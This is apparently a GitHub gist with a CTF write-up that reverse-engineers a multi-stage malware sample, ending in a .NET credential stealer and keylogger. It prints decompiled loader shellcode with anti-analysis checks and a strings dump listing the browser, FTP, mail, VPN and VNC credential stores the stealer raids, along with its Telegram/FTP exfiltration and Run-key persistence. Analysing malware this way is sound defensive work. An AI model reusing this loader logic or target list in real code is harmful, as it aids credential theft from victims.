Skip to content

Instantly share code, notes, and snippets.

@nick0ve

nick0ve/last.extracted

Last active November 25, 2021 19:49
Show Gist options
  • Save nick0ve/71fcb2105c6660efa65fff63c6692796 to your computer and use it in GitHub Desktop.
Save nick0ve/71fcb2105c6660efa65fff63c6692796 to your computer and use it in GitHub Desktop.
Download ZIP
ssd black friday challenge writeup by @nick0ve
Raw
last.extracted
5yyyy-MM-dd HH:mm:ssyyyy_MM_dd_HH_mm_ss<br><hr>ObjectLengthChainingModeGCMAuthTagLengthChainingModeKeyDataBlobAESMicrosoft Primitive ProviderCONNECTIONKEEP-ALIVEPROXY-AUTHENTICATEPROXY-AUTHORIZATIONTETRAILERTRANSFER-ENCODINGUPGRADE%startupfolder%\%insfolder%\%insname%/\%insfolder%\Software\Microsoft\Windows\CurrentVersion\Run%insregname%SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\RunTrue%GETMozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0OKhi_keep_searching\ttYSELECT * FROM Win32_ProcessorName MBUnknownCOCO_-_.zip yyyy-MM-dd hh-mm-ssCookieapplication/zipSCSC_.jpegScreenshotimage/jpeg/log.tmpKLKL_.html<html></html>Logtext/html[]Time: MM/dd/yyyy HH:mm:ssUser Name: Computer Name: OSFullName: CPU: RAM: IP Address: New Recovered!User Name: OSFullNameuninstallSoftware\Microsoft\Windows NT\CurrentVersion\WindowsLoad%ftphost%/%ftpuser%%ftppassword%STORLengthWriteCloseGetBytesOpera BrowserOpera Software\Opera StableYandex BrowserYandex\YandexBrowser\User DataIridium BrowserIridium\User DataChromiumChromium\User Data7Star7Star\7Star\User DataTorch BrowserTorch\User DataCool NovoMapleStudio\ChromePlus\User DataKometaKometa\User DataAmigoAmigo\User DataBraveBraveSoftware\Brave-Browser\User DataCentBrowserCentBrowser\User DataChedotChedot\User DataOrbitumOrbitum\User DataSputnikSputnik\Sputnik\User DataComodo DragonComodo\Dragon\User DataVivaldiVivaldi\User DataCitrioCatalinaGroup\Citrio\User Data360 Browser360Chrome\Chrome\User DataUranuCozMedia\Uran\User DataLiebao Browserliebao\User DataElements BrowserElements Browser\User DataEpic PrivacyEpic Privacy Browser\User DataCoccocCocCoc\Browser\User DataSleipnir 6Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewerQIP SurfQIP Surf\User DataCoowonCoowon\Coowon\User DataAPPDATA\CoreFTP\sites.idxHKEY_CURRENT_USER\Software\FTPWare\COREFTP\Sites\HostHKEY_CURRENT_USERSoftwareFTPWareCOREFTPSitesPortUserPWCoreFTPwebpanel,"smtpftpURL: Username: Password: Application: URL:Username:Password:Application:[email protected]_p@sssSSD{4g3nt_h3ker}image/jpg:Zone.Identifier\tmpG.tmp%urlkey%-f \Data\Tor\torrcp=%PostURL%127.0.0.1POST+%2Bapplication/x-www-form-urlencoded&&amp;<&lt;>&gt;&quot;Copied Text: <font color="#00b1ba"><b>[ </b> <b>]</b> <font color="#000000">()</font></font>False<font color="#00ba66">{BACK}</font></font><font color="#00ba66">{ALT+TAB}</font><font color="#00ba66">{ALT+F4}</font><font color="#00ba66">{TAB}</font><font color="#00ba66">{ESC}</font><font color="#00ba66">{Win}</font><font color="#00ba66">{CAPSLOCK}</font><font color="#00ba66">&uarr;</font><font color="#00ba66">&darr;</font><font color="#00ba66">&larr;</font><font color="#00ba66">&rarr;</font><font color="#00ba66">{DEL}</font><font color="#00ba66">{END}</font><font color="#00ba66">{HOME}</font><font color="#00ba66">{Insert}</font><font color="#00ba66">{NumLock}</font><font color="#00ba66">{PageDown}</font><font color="#00ba66">{PageUp}</font><font color="#00ba66">{ENTER}</font><font color="#00ba66">{F1}</font><font color="#00ba66">{F2}</font><font color="#00ba66">{F3}</font><font color="#00ba66">{F4}</font><font color="#00ba66">{F5}</font><font color="#00ba66">{F6}</font><font color="#00ba66">{F7}</font><font color="#00ba66">{F8}</font><font color="#00ba66">{F9}</font><font color="#00ba66">{F10}</font><font color="#00ba66">{F11}</font><font color="#00ba66">{F12}</font>control<font color="#00ba66">{CTRL}</font>Windows RDPcredentialpolicyblobrdgchrome{{{0}}}CopyToComputeHashsha512CopySystemDrive\WScript.ShellRegReadg401
502
500 Addchat_idcaption/sendDocumentdocument---------------------------x
--
multipart/form-data; boundary=Content-Disposition: form-data; name="{0}"
{1}Content-Disposition: form-data; name="{0}"; filename="{1}"
Content-Type: {2}
--
CookiesOperaChrome\Google\Chrome\User Data\360Chrome\Chrome\User DataYandexSRWare IronBrave Browser\Iridium\User DataCoolNovoEpic Privacy BrowserCocCocQQ BrowserTencent\QQBrowser\User DataUC BrowserUCBrowser\uCozMediacookies.sqliteFirefox\Mozilla\Firefox\IceCat\Mozilla\icecat\PaleMoon\Moonchild Productions\Pale Moon\SeaMonkey\Mozilla\SeaMonkey\Flock\Flock\Browser\K-Meleon\K-Meleon\Postbox\Postbox\Thunderbird\Thunderbird\IceDragon\Comodo\IceDragon\WaterFox\Waterfox\BlackHawk\NETGATE Technologies\BlackHawk\CyberFox\8pecxstudios\Cyberfox\Path=([A-z0-9\/\.\-]+)profiles.ini\Default\Profileorigin_urlusername_valuepassword_valuev10v11Opera Stable\Local State"encrypted_key":"(.*?)"\Default\Login Data\Login Data\Google\Chrome\User Data\loginsMajorMinor2F1A6504-0641-44CF-8BB5-3612D865F2E5Windows Secure Note3CCD5499-87A8-4B10-A215-608888DD3B55Windows Web Password Credential154E23D0-C644-4E6F-8CE6-5069272F999FWindows Credential Picker Protector4BF4C442-9B8A-41A0-B380-DD4A704DDB28Web Credentials77BC582B-F0A6-4E15-4E80-61736B6F3B29Windows CredentialsE69D7838-91B5-4FC9-89D5-230D4D4CC2BCWindows Domain Certificate Credential3E0E35BE-1B77-43E7-B873-AED901B6275BWindows Domain Password Credential3C886FF3-2669-4AA2-A8FB-3F6759A77548Windows Extended Credential00000000-0000-0000-0000-000000000000SchemaIdpResourceElementpIdentityElementpPackageSidpAuthenticatorElementIE/EdgeTypeValue\Common Files\Apple\Apple Application Support\plutil.exe\Apple Computer\Preferences\keychain.plist*Login Datajournalwow_logins\Microsoft\Edge\User DataEdge Chromium\Microsoft\Credentials\\Microsoft\Protect\GuidMasterKey\Default\EncryptedStorage\EncryptedStorageentriescategoryPasswordstr3str2blob0PopPasswordSmtpPasswordSoftware\IncrediMail\Identities\\Accounts_NewEmailAddressSmtpServerincredimailHKEY_CURRENT_USER\Software\Qualcomm\Eudora\CommandLinecurrentSettingsSavePasswordTextReturnAddressEudora\falkon\profiles\startProfile="([A-z0-9\/\.]+)"\browsedata.dbautofillFalkon BrowserstartProfile=([A-z0-9\/\.]+)Backend=([A-z0-9\/\.-]+)\settings.ini\Claws-mail\clawsrcpasskey0master_passphrase_salt=(.+)master_passphrase_pbkdf2_rounds=(.+)use_master_passphrase=(.+)\accountrcsmtp_serveraddressaccount\passwordstorerc{(.*),(.*)}(.*)ClawsMailTransformFinalBlockSubstringIterationCountsignons3.txt---
.
objectsDataDecryptTripleDesFlock BrowserALLUSERSPROFILE\\DynDNS\Updater\config.dyndnsusername==password=&Ht6KzXhChhttp://DynDns.comDynDNS\Psi\profiles\Psi+\profiles\accounts.xmlnamejidpasswordPsi/Psi+Software\OpenVPN-GUI\configsSoftware\OpenVPN-GUI\configs\usernameauth-dataentropyOpen VPNUSERPROFILE\OpenVPN\config\remote \FileZilla\recentservers.xml<Server><Host></Host>:<Port></Port><User></User><Pass encoding="base64"></Pass><Pass>FileZillaSOFTWARE\\Martin Prikryl\\WinSCP 2\\SessionsHostNameUserNamePublicKeyFilePortNumber22[PRIVATE KEY LOCATION: "{0}"]WinSCPUsernameAll Users\FlashFXP\3quick.datIP=port=user=pass=created=FlashFXP\FTP Navigator\Ftplist.txtServerNo PasswordFTP NavigatorProgramfiles(x86)programfiles\jDownloader\config\database.scriptprogramfiles(x86)INSERT INTO CONFIG VALUES('AccountController','sq.txtJDownloaderSoftware\PaltalkHKEY_CURRENT_USER\Software\Paltalk\pwdPaltalk\.purple\accounts.xml<account><protocol></protocol><name></name><password></password>Pidgin\SmartFTP\Client 2.0\Favorites\Quick Connect\\SmartFTP\Client 2.0\Favorites\Quick Connect\*.xml<Password></Password><Name></Name>SmartFTPappdata\Ipswitch\WS_FTP\Sites\ws_ftp.iniHOSTUIDPWDWS_FTPPWD=KeyModeIVPaddingCreateDecryptor\cftp\Ftplist.txt;Server=;Port=;Password=;User=;Anonymous=Name=FTPCommander\FTPGetter\servers.xml<server><server_ip></server_ip><server_port></server_port><server_user_name></server_user_name><server_user_password></server_user_password>FTPGetterHKEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUCHKEY_CURRENT_USER\SOFTWARE\Vitalwerks\DUCUSERnameNO-IP+-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz\The Bat!\Account.CFNzzzTheBatHKEY_CURRENT_USER\Software\RimArts\B2\SettingsDataDirFolder.lst\Mailbox.iniAccountSMTPServerMailAddressPassWdBecky!\Trillian\users\global\accounts.datAccountsTrillianSoftware\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676EmailIMAP PasswordPOP3 PasswordHTTP PasswordSMTP PasswordSMTP ServerOutlookHKEY_CURRENT_USER\Software\Aerofox\FoxmailPreviewExecutableHKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1FoxmailPath\Storage\\mail\\VirtualStore\Program Files\Foxmail\mail\\VirtualStore\Program Files (x86)\Foxmail\mail\\Accounts\Account.rec0\Account.stgReadDisposePOP3HostSMTPHostIncomingServerPOP3PasswordFoxmail5A71\Opera Mail\Opera Mail\wand.datopera:Opera Mailabcçdefgğhıijklmnoöpqrsştuüvwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
\Pocomail\accounts.iniPOPPassSMTPPassSMTPPocoMailRealVNC 4.xSOFTWARE\Wow6432Node\RealVNC\WinVNC4RealVNC 3.xSOFTWARE\RealVNC\vncserverSOFTWARE\RealVNC\WinVNC4Software\ORL\WinVNC3TightVNCSoftware\TightVNC\ServerPasswordViewOnlyTightVNC ControlPasswordControlPasswordTigerVNCSoftware\TigerVNC\ServerTrimUltraVNCProgramFiles(x86)\uvnc bvba\UltraVNC\ultravnc.inipasswdpasswd2ProgramFiles\UltraVNC\ultravnc.ini
\eM Client.dlleM Client\accounts.dateM ClientAccountConfiguration72905C47-F4FD-4CF7-A489-4E8121A155BDhosto6806642kbM7c5\Mailbird\Store\Store.dbServer_HostEncryptedPasswordMailbirdSenderIdentitiesNordVPNNordVPN directory not found!NordVpn.exe*user.configSelectSingleNode//setting[@name='Username']/valueInnerText//setting[@name='Password']/value\MySQL\Workbench\workbench_user_data.datMySQL Workbench%ProgramW6432%Private Internet Access\data\Private Internet Access\data\account.json.*"username":"(.*?)".*"password":"(.*?)"Private Internet Access<array><dict><string></string><data></data>Safari Browser -convert xml1 -s -o "\fixed_keychain.xml" A10B11C12D13E14F15ABCDEF(EndsWith)IndexOfUNIQUEtableSoftware\DownloadManager\Passwords\EncPasswordInternet Download Manager{0}http://127.0.0.1:HTTP/1.1 Hostname200 Connection established
Proxy-Agent: HToS5x
ConnectPathAndQueryFragment
Host: WrWExtractFilenTorAUTHENTICATE "%torpass%"SIGNAL NEWNYM250torStartInfoFileName\Tor\tor.exeArgumentsUseShellExecuteRedirectStandardOutputCreateNoWindowStartStandardOutputReadLineContainsBootstrapped 100%EndOfStreamIdAvoidDiskWrites 1
Log notice stdout
DormantCanceledByStartup 1
ControlPort 9051
CookieAuthentication 1
runasdaemon 1
ExtORPort auto
hashedcontrolpassword %hash%
DataDirectory %tordir%\Data\Tor
GeoIPFile %tordir%\Data\Tor\geoip
GeoIPv6File %tordir%\Data\Tor\geoip6
\tor.ziphttps://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%hash%%torpass%https://www.theonionrouter.com/dist.torproject.org/torbrowser/<a.+?href\s*=\s*(["'])(?<href>.+?)\1[^>]*>hrefReplaceTrimStartTrimEndtor-win32-TransformBlockHash16:Nonewin32_processorprocessorID0c5fb9f4-0b75-4651-9079-499a96a4cb87Win32_NetworkAdapterConfigurationIPEnabledMacAddress24732476-ac02-460e-96bc-0468819d1b49WinMgmts:InstancesOfWin32_BaseBoardSerialNumber322efe8f-8c48-473b-b7d9-4d92e51a6968x200061561Berkelet DB00000002 1.85 (Hash, version 2, native byte-order)Unknow database formatSEQUENCE {{0:X2} INTEGER OCTETSTRING OBJECTIDENTIFIER }sha256key4.dbmetaDataiditem1item2nssPrivatea11a1022a864886f70d02092a864886f70d010c050103key3.dbglobal-saltVersionpassword-checklogins.json\"(hostname|encryptedPassword|encryptedUsername)":"(.*?)"[^\u0020-\u007F]signons.sqlitemoz_loginshostnameencryptedUsernameencryptedPasswordVersion=4.0.0.0version=2.0.0.0mscorlibSystemMailClient.Protocols.Smtp.SmtpAccountConfigurationMailClient.Accounts.TlsTypeMailClient.Accounts.CredentialsModelTypesMailClient.Accounts.Mail.MailAccountConfigurationMailClient.Accounts.ArchivingScopeMailClient.Mail.MailAddress;infoAccountConfiguration+accountNameAccountConfiguration+usernameAccountConfiguration+passwordproviderName
Raw
shellcode-source.c
int doProcessNameHash(LPCWSTR processName)
{
ushort uVar1;
int local_8;
local_8 = 0x2326;
while( true ) {
uVar1 = *processName;
processName = processName + 1;
if (uVar1 == 0) break;
local_8 = local_8 * 0x21 + (uint)uVar1;
}
return local_8;
}
undefined4 isProcessRunning(int processNameHash)
{
int iVar1;
undefined4 local_244 [9];
WCHAR local_220 [260];
code *Process32NextW;
code *Process32FirstW;
code *CreateToolhelp32Snapshot;
int local_c;
undefined4 local_8;
local_8 = getKernel32DLL();
CreateToolhelp32Snapshot = (code *)resolveHash(local_8,0xea31d3b6);
Process32FirstW = (code *)resolveHash(local_8,0x5c7bf6e9);
Process32NextW = (code *)resolveHash(local_8,0x873d1860);
local_c = (*CreateToolhelp32Snapshot)(2,0);
if (local_c != -1) {
local_244[0] = 0x22c;
iVar1 = (*Process32FirstW)(local_c,local_244);
while (iVar1 != 0) {
iVar1 = doProcessNameHash(local_220);
if (iVar1 == processNameHash) {
return 1;
}
iVar1 = (*Process32NextW)(local_c,local_244);
}
}
return 0;
}
void main(undefined4 param_1,LPCWSTR param_2)
{
undefined4 kernel32DLL;
HANDLE hFile;
DWORD bufferSize;
char *buffer;
int isOk;
WCHAR filename [520];
undefined local_d0 [68];
undefined local_8c [16];
undefined4 local_7c;
undefined4 local_78;
undefined4 local_74;
undefined4 processHash1;
undefined4 processHash2;
undefined4 processHash3;
undefined4 processHash4;
code *CreateProcessW;
code *GetCommandLineW;
code *ReadFile;
undefined4 numberOfBytesRead;
code *VirtualAlloc;
code *GetFileSize;
code *CreateFileW;
code *GetModuleFileNameW;
code *ExitProcess;
code *Sleep;
char someHash [36];
numberOfBytesRead = 0;
someHash[0] = '5';
someHash[1] = 'd';
someHash[2] = 'e';
someHash[3] = '3';
someHash[4] = '0';
someHash[5] = 'f';
someHash[6] = '3';
someHash[7] = '8';
someHash[8] = '0';
someHash[9] = 'd';
someHash[10] = '8';
someHash[11] = 'c';
someHash[12] = '4';
someHash[13] = '2';
someHash[14] = '0';
someHash[15] = '7';
someHash[16] = 'a';
someHash[17] = '4';
someHash[18] = 'c';
someHash[19] = 'b';
someHash[20] = '0';
someHash[21] = '2';
someHash[22] = '3';
someHash[23] = 'b';
someHash[24] = '8';
someHash[25] = '9';
someHash[26] = '6';
someHash[27] = 'b';
someHash[28] = '0';
someHash[29] = 'e';
someHash[30] = '0';
someHash[31] = 'b';
someHash[32] = '\0';
local_74 = 0;
kernel32DLL = getKernel32DLL();
Sleep = (code *)resolveHash(kernel32DLL,0x34cf0bf);
ExitProcess = (code *)resolveHash(kernel32DLL,0x55e38b1f);
GetModuleFileNameW = (code *)resolveHash(kernel32DLL,0xd1775dc4);
local_78 = resolveHash(kernel32DLL,0xd6eb2188);
CreateProcessW = (code *)resolveHash(kernel32DLL,0xa2eae210);
local_7c = resolveHash(kernel32DLL,0xcd8538b2);
CreateFileW = (code *)resolveHash(kernel32DLL,0x8a111d91);
GetFileSize = (code *)resolveHash(kernel32DLL,0x170c1ca1);
VirtualAlloc = (code *)resolveHash(kernel32DLL,0xa5f15738);
ReadFile = (code *)resolveHash(kernel32DLL,0x433a3842);
GetCommandLineW = (code *)resolveHash(kernel32DLL,0x2ffe2c64);
processHash1 = 0x2d734193;
processHash2 = 0x63daa681;
processHash3 = 0x26090612;
processHash4 = 0x6f28fae0;
isOk = isProcessRunning(0x2d734193);
if ((((isOk != 0) || (isOk = isProcessRunning(processHash2), isOk != 0)) ||
(isOk = isProcessRunning(processHash3), isOk != 0)) ||
(isOk = isProcessRunning(processHash4), isOk != 0)) {
(*Sleep)(31000);
}
(*GetModuleFileNameW)((HMODULE)0x0,filename,0x103);
hFile = (*CreateFileW)(param_2,0x80000000,7,(LPSECURITY_ATTRIBUTES)0x0,3,0x80,(HANDLE)0x0);
if (((hFile != (HANDLE)0xffffffff) &&
(bufferSize = (*GetFileSize)(hFile,(LPDWORD)0x0), bufferSize != 0xffffffff)) &&
((buffer = (char *)(*VirtualAlloc)(0,bufferSize,0x3000,4), buffer != (char *)0x0 &&
(isOk = (*ReadFile)(hFile,buffer,bufferSize,&numberOfBytesRead,0), isOk != 0)))) {
decryptBuffer(buffer,someHash,0x20);
isOk = someAntidebugAndSanityChecks(buffer);
if (isOk != 0) {
(*Sleep)(3000);
memzero(local_8c,0x10);
memzero(local_d0,0x44);
kernel32DLL = (*GetCommandLineW)(0,0,0,0x20,0,0,local_d0,local_8c);
isOk = (*CreateProcessW)(filename,kernel32DLL);
if (isOk != 0) {
(*ExitProcess)(0);
}
}
(*ExitProcess)(0);
}
return;
}
Raw
ssd-black-friday-challenge.md

flag: SSD{4g3nt_h3ker}

Minidump Analysis

analyze mspaint.exe.dmp with Windbg, the dump was created in the Sleep function, called by mspaint.exe+80FC The function at mspaint.exe+80FC is clearly not an mspaint, briefly:

  • xor data 0xC2E0F bytes starting from 0x409020 with 0x45
  • write this data to fname = {getenv("temp")}/installer.exe
  • call system(fname)
  • enter in an infinite loop of remove(fname); sleep(1000)

installer.exe analysis

This program writes to a temp folder:

  • Idauud.exe -> which is the AutoIt interpret
  • acryprtgh.vsl -> an AutoIt script
  • wfmlrmkokn.idu -> a blob file
  • oon80gy9qs.exe -> which is a patched version of Idauud.exe, with changed:
    • coff_characteristics characteristics = IMAGE_FILE_EXECUTABLE_IMAGE | IMAGE_FILE_32BIT_MACHINE from IMAGE_FILE_EXECUTABLE_IMAGE | IMAGE_FILE_LARGE_ADDRESS_AWARE | IMAGE_FILE_32BIT_MACHINE
    • pe_dll_characteristics dllCharacteristics = IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE from IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE | IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE
    • stripped certificateTableEntry
  • Executes Idauud.exe acryprtgh.vsl

acryprtgh.vsl analysis

Writes a shellcode in $X35cqbeuflb, and executes it with VirtualAlloc + DllCallAddress chain

Shellcode analysis

It can be reversed with the help of a debugger and a ghidra script ssd-ghidra-hash-resolver.py.

You can find a partial recovered source code of the shellcode there

Briefly this shellcode:

  • Checks the list of running processes for blacklisted names with some hashes, if something is present sleeps for 31000 milliseconds 
    processHash1 = 0x2d734193;
processHash2 = 0x63daa681;
processHash3 = 0x26090612;
processHash4 = 0x6f28fae0;
isOk = isProcessRunning(0x2d734193);
if ((((isOk != 0) || (isOk = isProcessRunning(processHash2), isOk != 0)) ||
    (isOk = isProcessRunning(processHash3), isOk != 0)) ||
   (isOk = isProcessRunning(processHash4), isOk != 0)) {
  (*Sleep)(31000);
}
  • Open, read and decrypt the file wfmlrmkokn.idu, key = 5de30f380d8c4207a4cb023b896b0e0b, with function decryptBuffer located at .base+0x128b. The decrypted result is a PE file
  • In the end it does some wierd checks in the function @.text+0x027a and problably executes the decrypted buffer, since it a PE. I didn't reverse the shellcode anymore at this point.

Decrypted wfmlrmkokn.idu analysis

Didn't reverse in deep, just noticed that in the main function it does something with the resources, Opening this file with PEview, It is easy to spot that a resource is a PE file @file+0x11458 I extracted this PE with this script:

with open('./another_pe.exe', 'rb') as f:
    x = f.read()

stage5 = x[0x11458:0x47448+0x10]
print (len(stage5))
print (len(x[0x11458:]))

with open('last.exe', 'wb') as f:
    f.write(stage5)

Last PE analysis, finally the onion is unveiled

The last PE is an obfuscated .net binary. Opening it in dnSpy, I spotted that a big array is constructed and decrypted in static A49AA8D2-8915-4BE8-ACA2-15CECAABE69C():

	A49AA8D2-8915-4BE8-ACA2-15CECAABE69C.<<EMPTY_NAME>> = new byte[]
	{
		159, 210, 209, 208, 215, 130, 225, 224, 143, 199,
		196, 129, 238, 239, 158, 200, 215, 129, 203, 202,
		199, 198, 197, 196, 237, 254, 253, 238, 210, 211,
 ...

	for (int i = 0; i < A49AA8D2-8915-4BE8-ACA2-15CECAABE69C.<<EMPTY_NAME>>.Length; i++)
	{
		A49AA8D2-8915-4BE8-ACA2-15CECAABE69C.<<EMPTY_NAME>>[i] = (byte)((int)A49AA8D2-8915-4BE8-ACA2-15CECAABE69C.<<EMPTY_NAME>>[i] ^ i ^ 170);
	}

Applying the decryption in python reveals the file last.extracted, which grepping for the flag yields: [email protected]_p@sssSSD{4g3nt_h3ker} -> so the flag should be SSD{4g3nt_h3ker}

Raw
ssd-ghidra-hash-resolver.py
#Resolve current highlighted api hash
#@author
#@category _NEW_
#@keybinding ctrl k
#@menupath
#@toolbar
from ghidra.program.model.address import *
from ghidra.program.model.listing import *
from ghidra.program.model.symbol import *
from ghidra.program.model.data import *
from ghidra.program.model.pcode import *
from jarray import array
import struct
address_factory = currentProgram.getAddressFactory()
datatype_manager = currentProgram.getDataTypeManager()
function_manager = currentProgram.getFunctionManager()
def get_address(address):
return address_factory.getDefaultAddressSpace().getAddress(address)
def get_data_type(type):
data_type = datatype_manager.getDataType(datatype_manager.getRootCategory().getCategoryPath(), type)
assert data_type, 'type not found: %s' % type
return data_type
def name_hash(name):
#print ("name_hash:", name)
res_hash = 8998
M32 = (1<<32)-1
for b in name:
res_hash = (ord(b) + 33 * res_hash) & M32
return res_hash
def get_data_manager(name):
service = state.getTool().getService(ghidra.app.services.DataTypeManagerService)
for dm in service.getDataTypeManagers():
if dm.getName() == name:
return dm
return None
hashVal = int(currentLocation.getTokenName(), 0x10)
dm = get_data_manager('windows_vs12_32')
if dm:
func_hashes = {}
for dt in dm.getAllDataTypes():
if not isinstance(dt, FunctionDefinition):
continue
func_hashes[name_hash(dt.getName())] = dt
if func_hashes.get(hashVal) is not None:
print (func_hashes.get(hashVal))
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment